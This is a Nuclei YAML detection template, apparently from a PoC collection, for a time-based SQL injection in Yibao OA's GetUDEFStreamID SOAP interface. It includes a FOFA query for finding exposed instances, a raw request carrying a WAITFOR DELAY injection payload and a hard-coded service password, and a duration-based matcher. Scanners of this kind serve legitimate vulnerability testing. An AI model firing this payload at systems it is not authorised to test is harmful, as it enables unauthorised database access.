FOFA query
Yakit plugin UUID
PoC
Yakit YAML
Nuclei YAML
# Yibao OA: SQL injection in the GetUDEFStreamID interface.
# Detection is time-based (delay injection) and, per the description, prone to false positives.
id: yibao_OA-GetUDEFStreamID-sqli
info:
  name: 易宝OA-GetUDEFStreamID-SQL注入
  author: dreamer292 from 秃兔安全_tutusec.com
  severity: high
  description: 易宝OA系统GetUDEFStreamID接口存在SQL注入漏洞 检测方式为延时注入容易误报
  metadata:
    max-request: 1
    fofa-query: title="欢迎登录易宝OA系统" || banner="易宝OA"
    verified: true
http:
  - raw:
      - |+
        @timeout: 30s
        POST /WebService/BasicService.asmx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml; charset=utf-8
        Content-Length: 484
        SOAPAction: "http://tempuri.org/GetUDEFStreamID"

        <?xml version="1.0" encoding="utf-8"?>
        <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
          <soap:Body>
            <GetUDEFStreamID xmlns="http://tempuri.org/">
              <tableName>';WAITFOR DELAY '0:0:5'--</tableName>
              <webservicePassword>{ac80457b-368d-4062-b2dd-ae4d490e1c4b}</webservicePassword>
            </GetUDEFStreamID>
          </soap:Body>
        </soap:Envelope>
    max-redirects: 3
    matchers-condition: and
    matchers:
      # Single matcher: fires on any response that takes 5 seconds or longer,
      # so a slow host can match without being vulnerable.
      - type: dsl
        dsl:
          - 'duration>=5'
# Generated From WebFuzzer on 2024-12-07 12:27:44
Verified